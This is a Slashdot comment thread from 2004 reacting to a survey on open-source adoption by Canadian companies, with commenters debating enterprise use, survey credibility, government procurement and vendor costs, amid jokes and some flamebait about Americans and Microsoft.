by quantaman (517394) on Saturday May 01, @06:56PM (#9030461)
(http://www.ualberta.ca/~aluchko/blog.html)
Yeah can you please send a few of your american developers up here?
We can make the code but we just can't seem [openbsd.org] to produce the same quantity of bugs as you guys do [microsoft.com]. I mean administering a system is just no fun without panicking over a patch every couple days and we would really appreciate if you could show us how to make such buggy code so our users can enjoy the same level of patching as yours!
[ Reply to This | Parent ]
* 3 replies beneath your current threshold.

Open source is an integral part of the enterprise (Score:5, Interesting)
by BuddieFox (771947) on Saturday May 01, @04:08PM (#9029442)
Well, this all depends on the perspective:
Open source is an integral part of the enterprise environment these days in larger organizations, but that doesnt mean that its "linux on every desktop".
Working as a developer for a very large global consulting firm, I can say that the way open source is penetrating enterprises is by being "parts of the machinery", for example, if you are developing custom applications, it is almost unavoidable to use open source components such as Struts, Dom4j and tools like jUnit, Ant etc.

But we are still some distance from "open source dominating the environments", open source is gaining traction mostly in the areas where the developers have a big say in what is chosen. When it comes to the choice of "backbone platform", this is still very much a management choice of commercial platforms.
[ Reply to This ]

Re:Open source is an integral part of the enterpri (Score:5, Interesting)
by Soko (17987) on Saturday May 01, @04:51PM (#9029718)
(http://www.arstechnica.com/etc/linux/index.html)
OSS has more traction than you think, friend. It's the best friend I have right now, and I'm a hardware monkey/network admin/IT manager.

Open source is an integral part of the enterprise environment these days in larger organizations, but that doesnt mean that its "linux on every desktop".

Agreed, except for the "in larger organisations" part. I do the above job for a not so large outfit, and Open Source is something I try to employ as much as possible.

But we are still some distance from "open source dominating the environments", open source is gaining traction mostly in the areas where the developers have a big say in what is chosen. When it comes to the choice of "backbone platform", this is still very much a management choice of commercial platforms.

Open source may not be deployed everywhere in my company (yet), but it does affect any decision I make - in a round about way, it does dominate the environment. "Do I need to pay this company licensing fees, or is there an OSS equivalent package that will do it for less?" is something I muse every day on he job. I manage infrastructure, and right now, I'm deploying Linux as the backbone of my network, replacing a proprietary systems that adds no value when compared to the OSS alternative. I'm not a developer (any code I write shows it, too), but I like having the OSS clue stick to apply to the heads of any arrogant vendors (Quark, you are sooooo next in line for lumber off the forehead). The threat of OSS to thier bottom line is extremely valuable to me in keeping costs down and vendors honest.

IMHO, one of the main reasons that OSS exists is because some developers got a little too full of themselves and in thier arrogance pissed off the wrong people - end users like me. If most people weren't willing to actually use OSS, it simply would not be as pervasive as it is.

Soko
[ Reply to This | Parent ]
o Re:Open source is an integral part of the enterpri by BuddieFox (Score:3) Saturday May 01, @05:01PM
+ Re:Open source is an integral part of the enterpri by RoLi (Score:2) Saturday May 01, @05:37PM
+ Re:Open source is an integral part of the enterpri by Tony-A (Score:2) Sunday May 02, @03:35AM
o Re:Open source is an integral part of the enterpri by RickHunter (Score:2) Saturday May 01, @06:35PM
o OK troll boy, I'll play. by Anonymous Coward (Score:2) Saturday May 01, @06:36PM
+ Re:OK troll boy, I'll play. by Tony-A (Score:2) Sunday May 02, @03:53AM
o 1 reply beneath your current threshold.

Survey results (Score:5, Funny)
by k4_pacific (736911) on Saturday May 01, @04:11PM (#9029469)
(Last Journal: Saturday February 28, @08:26PM)
43% of respondents weren't home.
39% of respondents pretended they weren't home.
20% of respondents were unsure/undecided.

Margin of error was 2%
[ Reply to This ]

Spelling Error in Title (Score:1, Funny)
by Anonymous Coward on Saturday May 01, @04:11PM (#9029474)
I believe that's "Oupen Source"
[ Reply to This ]

Well... (Score:3, Interesting)
by kick_in_the_eye (539123) on Saturday May 01, @04:14PM (#9029487)
It's cuz' we're cheap!
[ Reply to This ]

* Re:Well... by MachDelta (Score:3) Saturday May 01, @05:22PM
o Re:Well... by Anonymous Coward (Score:1) Saturday May 01, @06:52PM
o Re:Well... by Anonymous Coward (Score:1) Saturday May 01, @06:56PM
+ 1 reply beneath your current threshold.
o 3 replies beneath your current threshold.
* Health care and IT by bcore (Score:1) Saturday May 01, @05:42PM
o 1 reply beneath your current threshold.
* 1 reply beneath your current threshold.

Credibility? (Score:5, Insightful)
by shirai (42309) * on Saturday May 01, @04:14PM (#9029494)
(http://www.citymax.com/)
Okay, I know this is the typical response but it has to be said: Where the $#@ is the credibility in this piece?

There is no information on how the people being surveyed were selected and how they were surveyed. I always find it suspicious at the least and downright misleading at the worst when people do their own surveys without revealing the details of data collection. A sample size would be nice.

It doesn't have to be super-detailed for the press release but it ought to at least say "Through out Internet survey to 100 of our members" would at least give context to their results.

If it's skewed I want to know. If it's accurate, I want to know that too.
[ Reply to This ]

* Re:Credibility? by incubusnb (Score:1) Saturday May 01, @04:36PM
Re:Credibility? (Score:4, Interesting)
by T-Ranger (10520) on Saturday May 01, @04:51PM (#9029717)
(http://chebucto.ns.ca/~jeffw)

From their website:

CATAAlliance (Canadian Advanced Technology Alliance) is Canada's leading, most influential and entrepreneurial technology alliance, in regular contact with twenty thousand high tech business executives.
Assumably they surveyed their members. How many, and exactly how, I don't know. It seems to me that being an tech industry group (but not a Open Source group) it is there job to provide as acurate information as possible to there members. They are not a OSS loby group. There target audience is their members, and it is there members who pay them. They have no reason to lie.

If you realy care, you could email the person who prepare the release. Its at the bottom of the artic.. Ah, fuck. Nevermind.
[ Reply to This | Parent ]
* 2 replies beneath your current threshold.

Open Source in their planning... (Score:4, Interesting)
by Eberlin (570874) on Saturday May 01, @04:16PM (#9029504)
Technically, don't MOST companies include open source in their planning? I mean after the widely publicized MS discounts given after the mention of anything Open Source, you'd at least try to leverage that.

The cynic in me thinks the term "Open Source" is used more as a bargaining tool than anything that gets implemented. I'm not sure I like that idea.
[ Reply to This ]

* Re:Open Source in their planning... by Anne Thwacks (Score:2) Saturday May 01, @04:52PM
o 1 reply beneath your current threshold.
* Re:Open Source in their planning... by Soko (Score:2) Saturday May 01, @05:08PM
o 1 reply beneath your current threshold.
* Re:Open Source in their planning... by RoLi (Score:2) Saturday May 01, @05:42PM
o Re:Open Source in their planning... by Anonymous Coward (Score:1) Saturday May 01, @06:27PM

Benefits of Open Source (Score:1, Informative)
by Anonymous Coward on Saturday May 01, @04:22PM (#9029537)
Personally, I use it extensively in my business. I take all sorts of Open Source software and resell it either as a standalone product or as a service. Open Source software is, for mature projects, well designed, easy to use, and there's a community standing behind it to help out should I ever need customizations. My profits have never been higher. Before, I used to have to develop everything myself or hire other programmers to create software for my company. Now, with the exception of usual overhead and support costs, it's all profit.

I would encourage other companies to do this as well, but right now this has given me a huge competitive advantage. I can undercut all my competitors and they just can't keep up due to overhead with their development staff. While I can still make a profit selling a product for $10, they need to charge at least $100 to recoup their expenses.

Thank you, Open Source!
[ Reply to This ]

* 2 replies beneath your current threshold.

That's the way to do it. (Score:2, Insightful)
by divine_13 (680820) on Saturday May 01, @04:35PM (#9029633)
(http://divine01.freeshell.org/)
This is the way professional advertizing etc. work.
Get one cigarette, then buy 600 after you get addicted.
[ Reply to This ]

At my workplace... (Score:5, Interesting)
by neiras (723124) on Saturday May 01, @04:38PM (#9029644)
...we use open-source software for nearly everything at the datacenter, and on a few desktops in the office (GAIM has made inroads among the marketing staff, and I run a GNOME desktop). Our attempts to use commercial software have usually meant restrictions that we couldn't live with (we tried using Zeus for our hosting customers and ended up trashing it and using Apache 2.0 because we couldn't extend it as we wanted to. Expensive mistake!)

The only commercial software we are seriously looking at on the server side right now is Caucho Resin Enterprise - it definitely beats out Tomcat for our purposes.

It just seems to be the default here. If you run a company, open source is the first option. Everybody worth hiring has a background in Unixish operating systems and open tools. Resumes from people with Microsoft credentials tend to end up in the circular file unless they have some serious programming achievements under their belts and at least _some_ familiarity with common open software.
[ Reply to This ]

* 1 reply beneath your current threshold.

Theres affinity towards Opensource in Canada (Score:4, Insightful)
by mnmn (145599) on Saturday May 01, @04:47PM (#9029690)
(http://ghazan.haider.name/)
Most IT guys Ive worked with knew and respected Linux. On one hand is the credibility thing, you need someone to point fingers to. For that reason I've been using the RedHat company and OpenBSD organization. Spend the money and buy copies (CDs) of the OS from them, and it becomes cheaper than Windows rather that (gasp) free! Companies want someone to point fingers to.

Theres also a strong affinity towards Linux. There are VPN technologies out there but most prefer to run the VPN box on Linux. However most applications needed by the organization are dependent on win32:

(1) ERP system. This requires Win32 or iSeries V5R3. Win32 is cheaper.
(2) Office suite. I could roll out OO but that will take some training and struggle.
(3) Lotus Notes. This runs only on OSX and win32. I cant switch to OSX because of the other apps.
(4) All the reporting tools like Crystal etc. They are resisting Linux for now.
(5) Active Directory Integration. Using OpenLDAP its still a bit of a struggle.

So gentlemen, it will take time!
[ Reply to This ]

Open Source Management? (Score:2, Interesting)
by zenetik (750376) on Saturday May 01, @04:55PM (#9029743)
(http://mynovember.com/)
I wish we could use open source management. The problem with proprietary management is the same as software: overpriced, bloated, slow and full of bugs. As a consultant, I've spent a great deal of time at some corporate dinosaurs and they all seem to be bogged down by the same ineffective, self-important conventional idiots. I won't name companies, but be weary of the cars you drive...
[ Reply to This ]

* Re:Open Source Management? by Geoffreyerffoeg (Score:2) Saturday May 01, @05:42PM

Canadian skeptic here (Score:4, Interesting)
by billcopc (196330) on Saturday May 01, @05:02PM (#9029772)
(http://fnarg.com/)
Trolling aside, you can interview 9 out of 10 business in Canada and they will chant Linux till the cops beat them up. But the missing #10 is the most important: Government. Canada is really just a big awkward government with a nice back yard, and Gov't is dead scared of free software, for several reasons that were hammered into my skull the hard way:

1. It's built by "evil hackers"

2. Since it's free, Mr CIO can't farm it out as a big money contract to one of his mates, or one-up that and hire them all under his wings as 'consultants'.

3. Since it's free, there is no one being paid to answer the phone when stuff breaks.

4. Billco likes Linux, and Gov't doesn't like Billco; therefore Gov't doesn't like Linux.

Ok so I pulled #4 out of my ass. The other 3 are still quite true. I'm not taking stabs at the PM either, even though he's in deep dog-poo for doing #2 (and getting caught), but like anything it's far too easy to spend other people's money irresponsibly.

[ Reply to This ]

* So true by bcore (Score:1) Saturday May 01, @05:32PM
* Re:Canadian skeptic here by pigscanfly.ca (Score:3) Saturday May 01, @05:41PM
o Which ones? by bcore (Score:1) Saturday May 01, @05:52PM
+ 1 reply beneath your current threshold.
* Re:Canadian skeptic here by Roger_Wilco (Score:1) Saturday May 01, @06:11PM
* Re:Canadian skeptic here by RickHunter (Score:2) Saturday May 01, @07:09PM
* Re:Canadian skeptic here by Chirs (Score:2) Sunday May 02, @12:38AM
* Re:Canadian skeptic here by 0x0d0a (Score:2) Sunday May 02, @05:21AM
* 2 replies beneath your current threshold.

Not just about the base cost (Score:3, Interesting)
by 16K Ram Pack (690082) on Saturday May 01, @05:12PM (#9029828)
(http://www.timalmond.com/)
I choose software, and often have a choice between OSS and not. This isn't a Linux environment. OSS I like. It's free.

Sometimes I like commercial. Often, the support is better, particularly if you want something mission-critical and the OSS software project is small (some OSS projects, it's one or two guys doing it in their spare time. I'd rather not have a support contract on that basis).

Sometimes I like OSS. You can see the code, so that's some insurance, you can modify it quickly yourself.

One library that we've paid for, I'm looking to replace with OSS, but I want to make sure that it's proven as reasonably stable before making the switch, and that we've done some work on the source code ourselves to ensure that we are familiar with it.

[ Reply to This ]

How many companies use BIND? Sendmail? (Score:5, Insightful)
by Moderation abuser (184013) on Saturday May 01, @05:18PM (#9029869)
Almost all major companies use "Open Source" all over the place. They have for years, decades even.

The only difference might be that the muppets who think they are in charge now have to have an "open source stratagem", mainly because "Open Source" is now a brand all of it's own.


[ Reply to This ]

* Re:How many companies use BIND? Sendmail? by swordgeek (Score:2) Saturday May 01, @06:35PM

How Ironic (Score:2, Interesting)
by Anonymous Coward on Saturday May 01, @05:54PM (#9030103)
I'm confused, is it bad for a CEO to go for cheaper resources that can harm employees or is it good?

When it's Open Source it seems to be good, yet this harms other developers (those that actually charge for software), but when it's outsourcing your high cost developers to cheaper developers India it's bad?
[ Reply to This ]

* 1 reply beneath your current threshold.

I know I plan to use OSS (Score:3, Interesting)
by MikeCapone (693319) <{moc.oohay} {ta} {llehretleks}> on Saturday May 01, @05:55PM (#9030112)
(http://mikecapone.blogspot.com/ | Last Journal: Friday March 19, @01:15AM)
Chances are, in a few years I'll be self-employed in the legal world and, although it's it extremely small scale as far as IT deployment is concerned, I plan on using as much OSS as I can.

I'm sure I won't be able to get away from some proprietary software (office suite?), but at least I'll try to encourage the companies doing good things (ie. Mac workstations but Linux or *BSD servers).

I've always been curious (maybe this should go in a Ask Slashdot post -- hmmm) to know what others are doing in the legal world.
[ Reply to This ]

Oh, yeah (Score:1)
by dupper (470576) * on Saturday May 01, @06:05PM (#9030157)
(http://slashdot.org/ | Last Journal: Tuesday February 17, @06:08PM)
Of course we use it, ya hoser: it's free, eh. More money to spend on Labatts and Leafs tickets.
[ Reply to This ]

Microsoft = American and American = Hated (Score:1, Flamebait)
by dsanfte (443781) on Saturday May 01, @07:32PM (#9030675)
(http://slashdot.org/ | Last Journal: Monday March 08, @11:18AM)
Sorry, but that does play into it. Microsoft is a US corporation, and the US isn't exactly in high regard up here, what with your moron in the white house.

People view using linux over MS as sticking it to MS with their pocketbooks. And MS is almost synonymous with the United States. I don't need to elaborate.
[ Reply to This ]

* Re:Microsoft = American and American = Hated by BCW2 (Score:1) Saturday May 01, @08:30PM
* Re:Microsoft = American and American = Hated by 0x0d0a (Score:2) Sunday May 02, @05:10AM

I live in Canada and well, it's not THAT common (Score:3, Insightful)
by NeedleSurfer (768029) on Saturday May 01, @07:35PM (#9030704)
It's not because 9 out of ten person answered considering/using open source that 9 out of then entreprises use it. open source can also mean some P2P software, server software or digital thieving tools (playfair and the like). It doesn't mean that 9 out of then company uses Linux. I work in AV for coorporate events (amongst other things) I do a lot of conventions with a lot of entreprise in various domain, pharmaceutical, business associations, health, governments, technology...

The most Linux box I've seen at the same convention was 6-7, I can assure you that more and more scientific coorporations/peoples are now using macs, in the past 3 month we saw more macs than ever before at conventions, if the convention was about pharmaceutical, health, genomics, physics or nanotech, the proportion of macs even surpass the windows one (one of those convention had around 60% macs, out of 5000 attendees from around the world... (APS) ).

As for the people I speak with in those conventions (rough proportions: 20% salespeople, 30-40% employees/students/consultants, 20% presidents/CEO, 20% marketing/public relation) most of them don't use, aren't interested in open-source or Linux (they know it exist but they haven't used it), the exception being tech and science people.

Don't get me wrong I am not saying the result of the survey isn't right all I'm saying is that it puts open-source in the wrong light, I believe it is indeed very common in Canada but not as much as those results reflects.
[ Reply to This ]

* Re:I live in Canada and well, it's not THAT common by mini me (Score:2) Sunday May 02, @12:17AM
* 1 reply beneath your current threshold.

In Socialist Canada... (Score:1)
by chinmay7 (776189) on Saturday May 01, @08:00PM (#9030851)
(http://people.vanderbilt.edu/~chinmay.soman/)
...OpenSource Mainstreams you!
[ Reply to This ]

Re:Great My Arse (Score:3, Insightful)
by ajs318 (655362) on Saturday May 01, @04:29PM (#9029587)
Closed source software is a worse form of exploitation, more akin to slavery. If you work on an Open Source project, you get to keep everything you invested in it as well as a dividend from everyone else's investment in it. If you work on a Closed Source project, some faceless corporation owns everything you put into it.
[ Reply to This | Parent ]

* Re:Great My Arse by Anonymous Coward (Score:1) Saturday May 01, @04:48PM
o Re:Great My Arse by ajs318 (Score:2) Saturday May 01, @05:40PM
+ 1 reply beneath your current threshold.
* Re:Great My Arse by smallpaul (Score:2) Saturday May 01, @05:49PM
* Re:Great My Arse by NineNine (Score:3) Saturday May 01, @07:51PM
* Re:Great My Arse by Citizen of Earth (Score:2) Saturday May 01, @11:23PM

Re:Great My Arse (Score:1, Insightful)
by Anonymous Coward on Saturday May 01, @04:38PM (#9029646)
And what's wrong with having others work for free? It's THEIR choice, so why shouldn't I try and make a profit from it? You know, if people could sell air and water, they WOULD. It's the American Way... everyone tries to make a buck somehow.
[ Reply to This | Parent ]

* Re:Great My Arse by alien_tracking_devic (Score:1) Saturday May 01, @05:14PM
o 1 reply beneath your current threshold.

Re:Saweeet! (Score:1)
by BeerGood (561775) on Saturday May 01, @05:45PM (#9030048)
It's nice to hear that some Canadian companies are taking advantage of Linux however some are doing just the opposite. I work for an aerospace company in Montreal. In the past Linux was used a lot. Now, I fear, some high and mighty VP has decided that Windose is the way to go. I have been forced to witness the slow transformation of our key systems go from Linux to you know what...
[ Reply to This | Parent ]

* 2 replies beneath your current threshold.

Re:Great My Arse (Score:4, Interesting)
by Geoffreyerffoeg (729040) < > on Saturday May 01, @05:45PM (#9030050)
As long as there are closed-source products that can benefit from open-source products ("benefit" may not necessarily mean "include code"; you can sell proprietary software through GPL'd webservers running GNU/Linux, etc.), OSS will be mildly unfair at the border between OSS and proprietary software. Many believe that OSS's intrinsic benefits outweigh this "exploitation", as you put it, and still continue to support OSS.
[ Reply to This | Parent ]

Re:MMMmm yeah but (Score:1)
by b_burton1981 (659064) on Saturday May 01, @08:11PM (#9030916)
(http://www.cs.dal.ca/~burton/)
Americans invented hockey eh? Just another example of an arrogant american assface that lives in his arrogant american assface bubble.
Hockey was invented in Nova Scotia, CANADA [birthplaceofhockey.com].
[ Reply to This | Parent ]

# 13 replies beneath your current threshold.  ¶ 3:18 AM